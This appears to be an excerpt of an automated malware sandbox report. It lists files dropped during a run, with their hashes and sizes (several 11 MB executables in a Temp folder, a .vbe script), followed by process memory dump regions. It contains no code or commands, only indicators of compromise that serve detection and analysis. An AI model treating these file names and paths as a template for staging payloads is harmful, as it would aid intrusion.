SHA512 329c3a9159ea2fdce5e7a28070bcf9d6d67eca0b27c4564e5250e7a407c8b551b68a034bfde9d8d688fa5a1ae6e29e132497b3a630796a97b464762ca0d81bb7
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfuhtj0d.zjk.ps1
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\x10.exe
Filesize 11.4MB
MD5 b93fc536df3c66e783fcbb9071db7545
SHA1 ce29bc506242c2389366f67edb3b36577d01f778
SHA256 9267614f67e94feeeae12c00f294e8af4587cf74ce817d179098d7e17ef24874
SHA512 4b4a87624eb5f23a13ac55acc874e9444c41b54a772e3d89a5a383a476d09db6dcdac69bc914645fe8c3102ea050a4dbede65f379c4f51aa1fdeb01e8194b1e6
-
C:\Users\Admin\AppData\Local\Temp\x11.exe
Filesize 11.4MB
MD5 34cb7fca8cb671327865d0bcf6de72bc
SHA1 f0b1cedace31b386c893530e6dce75c2ecfef083
SHA256 a6a27d9ba682a107558cdb16fcd50ebbe3d112c8dab38e96d5926c522781cc81
SHA512 a09a2fd355e0e7f7a7bf0c25fee3300d7e695f1871514181aef6cb7c5d9f085f6a3003cfea423ad3c79d1b463b2dd3e323c84ae6d8e352483270ee20e520d373
-
C:\Users\Admin\AppData\Local\Temp\x12.exe
Filesize 11.5MB
MD5 a236344bcc36451b5760c4bf40df3cda
SHA1 201737c41d87013535c5407f264f5d8e38f3351a
SHA256 e5e02b828d06986c27c50cf3398ee4e9fc56fcdd017684ab27388ebd1f4fd265
SHA512 ee1b7daf72fd2a38e1c7f2ce8557ce164a1818485efd49506bbbdccce33eab702008aabb5721a13b9a14282be92a8a0b29ceccc157aebb591afa10d5ee7ccfd6
-
C:\Users\Admin\AppData\Local\Temp\x4.exe
Filesize 11.4MB
MD5 609a00e116060457295ce9293e6e3b3e
SHA1 e99114d54d914b0d543e62ff54807d83551a16b6
SHA256 5cac320a19828d4e3e89428ad877951babaa6739a337ff4c8c2f3b9828d85358
SHA512 1c1f117e06ca09dab65626bca4cab8ccf4b3073dca564a6cc2dc9e82a752f936150ff75e077db0c906d1248f9ca9bb94d1af8fed616d8e013c548b25033f8fcc
-
C:\Users\Admin\AppData\Local\Temp\x5.exe
Filesize 11.4MB
MD5 8dbee0cb9b7550432df6beb4d9ea5cf0
SHA1 592502d95f326d76387d85fb48036179a7d15d38
SHA256 d7ffd20027f5b1b9948e76fa157023c22a86425e026a377684a3947abdb61135
SHA512 20422414b413c33b1db119488a71322b449db756ecee73c3825fee991fd468a0e09c6ae4b60fe2fd568b0590b77df43937ef8e35d752ff931482519d9fb0c183
-
C:\Users\Admin\AppData\Local\Temp\x6.exe
Filesize 11.4MB
MD5 61f5d17c10de6541139134fb7058f88e
SHA1 a6df4a45aab40753023f2fdd7efd32ae9a226ff5
SHA256 914287ad713df86ea9fed9f86cd963f88eb22de143d8892b7ef055fd45dba567
SHA512 28b66e1cb8334e806139c8b30ec3100010abf277d9d2e5eecf99ac837fb384ca5bf76de2549bf4faf92614cfaa6a861abbe75055248242d9dc392c319375a900
-
C:\Users\Admin\AppData\Local\Temp\x7.exe
Filesize 11.4MB
MD5 0e9fee8861c55c0ebadc5f678fbd8a9a
SHA1 c760e5d24b60902f566529af6ddaf2b90e319046
SHA256 866d6644ccce8d86d9526ef959ee5ddd9414e35750a1a10968035063ffa694d8
SHA512 f3461f6e0c0004a0b56578efd83d7fd3f79ec47ad8e0848ae14d21bb585ecbfec9770296382f63054395e636ba911b9e4bcc3f88c0eb9b73e542ad1f5d0b869e
-
C:\Users\Admin\AppData\Local\Temp\x8.exe
Filesize 11.4MB
MD5 dd97aab085b140b715dd1a52038e3c70
SHA1 21a8cbffa7c31a3ae0493b8567b528faba5c4fe9
SHA256 42be65ad4df6bf83ce6a30c1a159921463571c32faf372af53a5edab641ea7aa
SHA512 7ad65e44d706e304c493895eec33a538937de13a13b0af7b13be95be0615177d78e1eb3b8cbd06e5612dc7bcf522d2c9abd5c6ab4efacf20052bdf7e09bc4ba2
-
C:\Users\Admin\AppData\Local\Temp\x9.exe
Filesize 11.4MB
MD5 7e5f18a5c7eb009e54ae4fc6127e864c
SHA1 e9217d8f28de469a091ce420c5f74abd5e77ae92
SHA256 60f981607fdd0547fa8afb700fbfc0cc8fcac163bc819e36bbd859ce5594b016
SHA512 2a4ef3c3c13a59ca681e189b662952583f5d124bd7cb5f8690aa30c44871fda2db9839b55bc26e0e53af7f0447e910d405a3693aacbd214e13a62b13f11061ed
-
C:\agentInto\ygzWE.vbe
Filesize 204B
MD5 1e49f9332d5b41ddcaf97f7c284c16f8
SHA1 aa9f15475f700366b4b22728dce302b58401850b
SHA256 d569b2b96fe889ccca95d5296d45a5b05e501bdefbe6216d30a53267a0bcf55a
SHA512 1487aad116ee07a2abbba90f1290657420057c98e5f7a8a8f308f497ea5176ff7ba77252ce709c84318947834637c171bb69e6dbea9e4d9f3d8e19ca260b652b
-
memory/2656-198-0x00007FFEE2A80000-0x00007FFEE2AA4000-memory.dmp
Filesize: 144KB
-
memory/2656-193-0x00007FFEE2AB0000-0x00007FFEE2ADD000-memory.dmp
Filesize: 180KB
-
memory/2656-2152-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp
Filesize: 148KB
-
memory/2656-2153-0x00007FFEF8840000-0x00007FFEF884F000-memory.dmp
Filesize: 60KB
-
memory/2656-2154-0x00007FFEE2AB0000-0x00007FFEE2ADD000-memory.dmp
Filesize: 180KB
-
memory/2656-2155-0x00007FFEEA580000-0x00007FFEEA59A000-memory.dmp
Filesize: 104KB
-
memory/2656-2156-0x00007FFEE2A80000-0x00007FFEE2AA4000-memory.dmp
Filesize: 144KB
-
memory/2656-2150-0x00007FFEF3360000-0x00007FFEF347B000-memory.dmp
Filesize: 1.1MB
-
memory/2656-209-0x00007FFEE27F0000-0x00007FFEE28BD000-memory.dmp
Filesize: 820KB
-
memory/2656-2149-0x00007FFEFBD50000-0x00007FFEFBD5D000-memory.dmp
Filesize: 52KB
-
memory/2656-2069-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp
Filesize: 148KB
-
memory/2656-2072-0x00007FFEEA580000-0x00007FFEEA59A000-memory.dmp
Filesize: 104KB
-
memory/2656-2073-0x00007FFEE2A80000-0x00007FFEE2AA4000-memory.dmp
Filesize: 144KB
-
memory/2656-2068-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp
Filesize: 6.8MB
-
memory/2656-2077-0x00007FFEE28C0000-0x00007FFEE28F3000-memory.dmp
Filesize: 204KB
-
memory/2656-2148-0x00007FFEFBD60000-0x00007FFEFBD74000-memory.dmp
Filesize: 80KB
-
memory/2656-2078-0x00007FFEE27F0000-0x00007FFEE28BD000-memory.dmp
Filesize: 820KB
-
memory/2656-2147-0x00007FFEE22C0000-0x00007FFEE27E9000-memory.dmp
Filesize: 5.2MB
-
memory/2656-2142-0x00007FFEE2900000-0x00007FFEE2A7E000-memory.dmp
Filesize: 1.5MB
-
memory/2656-332-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp
Filesize: 6.8MB
-
memory/2656-417-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp
Filesize: 148KB
-
memory/2656-450-0x00007FFEF3360000-0x00007FFEF347B000-memory.dmp
Filesize: 1.1MB
-
memory/2656-2145-0x00007FFEE28C0000-0x00007FFEE28F3000-memory.dmp
Filesize: 204KB
-
memory/2656-333-0x00007FFEFBD50000-0x00007FFEFBD5D000-memory.dmp
Filesize: 52KB
-
memory/2656-295-0x00007FFEFBD60000-0x00007FFEFBD74000-memory.dmp
Filesize: 80KB
-
memory/2656-2144-0x00007FFEF39F0000-0x00007FFEF39FD000-memory.dmp
Filesize: 52KB
-
memory/2656-211-0x000001EA0BB20000-0x000001EA0C049000-memory.dmp
Filesize: 5.2MB
-
memory/2656-2143-0x00007FFEE4A70000-0x00007FFEE4A89000-memory.dmp
Filesize: 100KB
-
memory/2656-163-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp
Filesize: 6.8MB
-
memory/2656-2146-0x00007FFEE27F0000-0x00007FFEE28BD000-memory.dmp
Filesize: 820KB
-
memory/2656-169-0x00007FFEEF070000-0x00007FFEEF095000-memory.dmp
Filesize: 148KB
-
memory/2656-2080-0x00007FFEE22C0000-0x00007FFEE27E9000-memory.dmp
Filesize: 5.2MB
-
memory/2656-2074-0x00007FFEE2900000-0x00007FFEE2A7E000-memory.dmp
Filesize: 1.5MB
-
memory/2656-205-0x00007FFEE28C0000-0x00007FFEE28F3000-memory.dmp
Filesize: 204KB
-
memory/2656-202-0x00007FFEE4A70000-0x00007FFEE4A89000-memory.dmp
Filesize: 100KB
-
memory/2656-187-0x00007FFEF8840000-0x00007FFEF884F000-memory.dmp
Filesize: 60KB
-
memory/2656-210-0x00007FFEE22C0000-0x00007FFEE27E9000-memory.dmp
Filesize: 5.2MB
-
memory/2656-2151-0x00007FFEE2AE0000-0x00007FFEE31A5000-memory.dmp
Filesize: 6.8MB
-
memory/2656-195-0x00007FFEEA580000-0x00007FFEEA59A000-memory.dmp
Filesize: 104KB
-
memory/2656-199-0x00007FFEE2900000-0x00007FFEE2A7E000-memory.dmp
Filesize: 1.5MB
-
memory/2656-203-0x00007FFEF39F0000-0x00007FFEF39FD000-memory.dmp
Filesize: 52KB
-
memory/4028-1833-0x0000027EE7800000-0x0000027EE780E000-memory.dmp
Filesize: 56KB
-
memory/4028-1810-0x0000027EE44F0000-0x0000027EE44F8000-memory.dmp
Filesize: 32KB
-
memory/4028-2203-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-1803-0x0000027EE4540000-0x0000027EE45BE000-memory.dmp
Filesize: 504KB
-
memory/4028-2183-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-1804-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-2180-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-2178-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-2270-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-1806-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-2291-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-2293-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-1807-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-1778-0x0000027EE39F0000-0x0000027EE3AA2000-memory.dmp
Filesize: 712KB
-
memory/4028-2134-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-2135-0x00007FFEF2F40000-0x00007FFEF2F64000-memory.dmp
Filesize: 144KB
-
memory/4028-1802-0x0000027EE3900000-0x0000027EE390E000-memory.dmp
Filesize: 56KB
-
memory/4028-2259-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-2181-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-1739-0x0000027EC91B0000-0x0000027EC91CA000-memory.dmp
Filesize: 104KB
-
memory/4028-1805-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-1767-0x0000027EE3C80000-0x0000027EE41BC000-memory.dmp
Filesize: 5.2MB
-
memory/4028-1777-0x0000027EE3930000-0x0000027EE39EA000-memory.dmp
Filesize: 744KB
-
memory/4028-1832-0x0000027EE7830000-0x0000027EE7868000-memory.dmp
Filesize: 224KB
-
memory/4028-2207-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4028-2205-0x0000000180000000-0x0000000180B15000-memory.dmp
Filesize: 11.1MB
-
memory/4976-213-0x00000000054F0000-0x0000000005502000-memory.dmp
Filesize: 72KB
-
memory/4976-164-0x0000000002360000-0x000000000236A000-memory.dmp
Filesize: 40KB
-
memory/4976-158-0x0000000000010000-0x000000000001A000-memory.dmp
Filesize: 40KB
-
memory/5160-1729-0x000002B8FE5B0000-0x000002B8FE5D2000-memory.dmp
Filesize: 136KB
-
memory/5180-1919-0x00007FFF00C30000-0x00007FFF00C31000-memory.dmp
Filesize: 4KB
-
memory/5180-1918-0x00007FFF00710000-0x00007FFF00711000-memory.dmp
Filesize: 4KB
-
memory/5312-1899-0x00007FFF002D0000-0x00007FFF002D1000-memory.dmp
Filesize: 4KB
-
memory/5484-1992-0x00007FFF002D0000-0x00007FFF002D1000-memory.dmp
Filesize: 4KB
-
memory/5760-2158-0x000000001C680000-0x000000001C692000-memory.dmp
Filesize: 72KB
-
memory/5868-2020-0x0000000000650000-0x0000000000A52000-memory.dmp
Filesize: 4.0MB
-
memory/5868-2067-0x000000001C1D0000-0x000000001C1D8000-memory.dmp
Filesize: 32KB
-
memory/5868-2079-0x000000001C1E0000-0x000000001C1EC000-memory.dmp
Filesize: 48KB
-
memory/5868-2084-0x000000001C1F0000-0x000000001C1FE000-memory.dmp
Filesize: 56KB
-
memory/5868-2085-0x000000001C200000-0x000000001C208000-memory.dmp
Filesize: 32KB
-
memory/5868-2086-0x000000001C210000-0x000000001C218000-memory.dmp
Filesize: 32KB
-
memory/5868-2087-0x000000001C220000-0x000000001C228000-memory.dmp
Filesize: 32KB
-
memory/5868-2089-0x000000001C240000-0x000000001C24C000-memory.dmp
Filesize: 48KB
-
memory/5868-2088-0x000000001C230000-0x000000001C23A000-memory.dmp
Filesize: 40KB
-
memory/5868-2065-0x000000001BF60000-0x000000001BF68000-memory.dmp
Filesize: 32KB
-
memory/5868-2066-0x000000001BFC0000-0x000000001BFCC000-memory.dmp
Filesize: 48KB
-
memory/5868-2063-0x000000001BF40000-0x000000001BF48000-memory.dmp
Filesize: 32KB
-
memory/5868-2064-0x000000001BF50000-0x000000001BF5C000-memory.dmp
Filesize: 48KB
-
memory/5868-2062-0x000000001C470000-0x000000001C998000-memory.dmp
Filesize: 5.2MB
-
memory/5868-2059-0x000000001B680000-0x000000001B68C000-memory.dmp
Filesize: 48KB
-
memory/5868-2061-0x000000001B6B0000-0x000000001B6C2000-memory.dmp
Filesize: 72KB
-
memory/5868-2060-0x000000001B690000-0x000000001B698000-memory.dmp
Filesize: 32KB
-
memory/5868-2058-0x000000001B670000-0x000000001B67C000-memory.dmp
Filesize: 48KB
-
memory/5868-2057-0x000000001BEF0000-0x000000001BF46000-memory.dmp
Filesize: 344KB
-
memory/5868-2055-0x000000001B600000-0x000000001B610000-memory.dmp
Filesize: 64KB
-
memory/5868-2056-0x000000001B660000-0x000000001B66A000-memory.dmp
Filesize: 40KB
-
memory/5868-2054-0x000000001B5F0000-0x000000001B5F8000-memory.dmp
Filesize: 32KB
-
memory/5868-2053-0x000000001B5D0000-0x000000001B5DC000-memory.dmp
Filesize: 48KB
-
memory/5868-2036-0x000000001B610000-0x000000001B660000-memory.dmp
Filesize: 320KB
-
memory/5868-2037-0x0000000002CB0000-0x0000000002CB8000-memory.dmp
Filesize: 32KB
-
memory/5868-2038-0x0000000002CC0000-0x0000000002CD6000-memory.dmp
Filesize: 88KB
-
memory/5868-2040-0x000000001B5E0000-0x000000001B5F2000-memory.dmp
Filesize: 72KB
-
memory/5868-2039-0x000000001B5C0000-0x000000001B5C8000-memory.dmp
Filesize: 32KB
-
memory/5868-2035-0x0000000002C90000-0x0000000002CAC000-memory.dmp
Filesize: 112KB
-
memory/5868-2034-0x0000000002C80000-0x0000000002C88000-memory.dmp
Filesize: 32KB
-
memory/5868-2032-0x0000000002C60000-0x0000000002C6E000-memory.dmp
Filesize: 56KB
-
memory/6040-1790-0x0000014F56850000-0x0000014F56858000-memory.dmp
Filesize: 32KB